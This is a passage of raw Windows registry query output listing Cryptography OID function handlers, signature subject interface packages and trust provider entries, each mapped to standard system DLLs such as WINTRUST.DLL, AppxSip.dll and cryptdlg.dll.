REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\SysWOW64\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\SysWOW64\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\SysWOW64\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\SysWOW64\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCTLUsage\DEFAULT Dll REG_MULTI_SZ C:\Windows\SysWOW64\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyRevocation\DEFAULT Dll REG_MULTI_SZ C:\Windows\SysWOW64\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2000 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2001 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2002 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2003 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2004 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2005 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2006 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2007 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2008 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2009 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2010 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2011 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2012 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2130 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2221 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2222 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2223 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.12.2.1 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.12.2.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.12.2.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.16.1.1 Dll REG_SZ C:\Windows\SysWOW64\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.16.4 Dll REG_SZ C:\Windows\SysWOW64\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.10 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.11 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.12 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.15 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.20 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.25 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.26 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.27 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.28 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.30 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.1.1 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.1 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.11 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.12 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.2 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.3 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.4 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2000 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2001 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2002 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2003 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2004 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2005 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2006 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2007 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2008 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2009 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2010 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2011 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2012 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2130 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2221 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2222 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2223 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.12.2.1 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.12.2.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.12.2.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.16.1.1 Dll REG_SZ C:\Windows\SysWOW64\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.16.4 Dll REG_SZ C:\Windows\SysWOW64\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.10 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.11 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.12 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.15 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.20 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.25 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.26 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.27 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.28 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.30 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.1.1 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.1 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.11 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.12 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.2 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.3 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.4 Dll REG_SZ C:\Windows\SysWOW64\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllFormatObject\1.3.6.1.5.5.7.3.4 Dll REG_SZ C:\Windows\SysWOW64\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllFormatObject\2.5.29.32 Dll REG_SZ C:\Windows\SysWOW64\cryptdlg.dll End of search: 204 match(es) found. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\SysWOW64\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL 